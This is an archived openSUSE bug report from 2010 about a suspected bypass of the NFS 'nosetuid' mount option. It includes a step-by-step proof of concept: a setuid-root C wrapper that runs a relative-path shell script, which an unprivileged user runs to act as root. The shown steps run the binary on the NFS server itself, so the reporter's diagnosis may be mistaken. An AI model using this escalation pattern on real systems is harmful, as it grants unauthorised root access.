Mailinglist Archive: opensuse-bugs (4671 mails)

< Previous Next >
[Bug 640601] New: Priv Gain thru NFS - suspect mount nosetuid being bypassed
  • From: bugzilla_noreply@xxxxxxxxxx
  • Date: Mon, 20 Sep 2010 18:07:43 +0000
  • Message-id: <bug-640601-21960@xxxxxxxxxxxxxxxxxxxxxxxx/>

https://bugzilla.novell.com/show_bug.cgi?id=640601

https://bugzilla.novell.com/show_bug.cgi?id=640601#c0


Summary: Priv Gain thru NFS - suspect mount nosetuid being
bypassed
Classification: openSUSE
Product: openSUSE 11.2
Version: Final
Platform: x86-64
OS/Version: openSUSE 11.2
Status: NEW
Severity: Critical
Priority: P5 - None
Component: Security
AssignedTo: security-team@xxxxxxx
ReportedBy: p.chiu@xxxxxxxx
QAContact: qa@xxxxxxx
Found By: ---
Blocker: ---


User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; (R1
1.6); SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR
3.0.30618; AskTbBLT/5.8.0.12304)

We allow a software engineer user with sudo (all) access on one OpenSuse 11.2
server called ServerA.

We also mount a storage from ServerB (another OpenSuse 11.2 system) using NFS
to allow full access for some applications (ie. with no_root_squash enabled.)

mount serverB:/serverB /serverB
mount -o remount,nosetuid serverB:/serverB /serverB
mount | grep serverB
serverB:/serverB on /serverB type nfs
(rw,remount,nosetuid,address=192.168.123.1,nfsvers=3,proto=tcp,mountproto=udp)

The user then logs on serverA.

sudo mkdir /serverB/test
cd /serverB/test
sudo vi script1.c to contain
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
setuid( 0 );
system( "./script2.sh" );

return 0;
}

sudo cc -o script1.o script1.c
sudo chmod 4755 script1.o
sudo vi script2.sh to contain
mkdir /abcd

sudo chmod 755 script2.sh
ls -ls
pcmc@aspre:/mnt/holly1/test> ls -ls
total 20
4 -rw-r--r-- 1 root root 158 2010-09-20 18:25 script1.c
12 -rwsr-xr-x 1 root root 11942 2010-09-20 18:27 script1.o
4 -rwxr-xr-x 1 root root 12 2010-09-20 18:26 script2.sh

Now, any unprivileged users on serverB will be able to obtain root privileges
by invoking the program script1.o.

For instance, logged on serverB,
su - lp
ls -lsd /abcd will show
ls: cannot access /abcd: No such file or directory
cd /serverB/test
/script1.o
ls -lsd /abcd
4 drwxr-xr-x 2 root lp 4096 2010-09-20 18:31 /abcd

Imagine what you can put inside script2.sh!!!

It appears that the mount nosetuid option is ignored.


Reproducible: Always

Steps to Reproduce:
1. as stated above
2.
3.
Actual Results:
as described above

--
Configure bugmail: https://bugzilla.novell.com/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.

< Previous Next >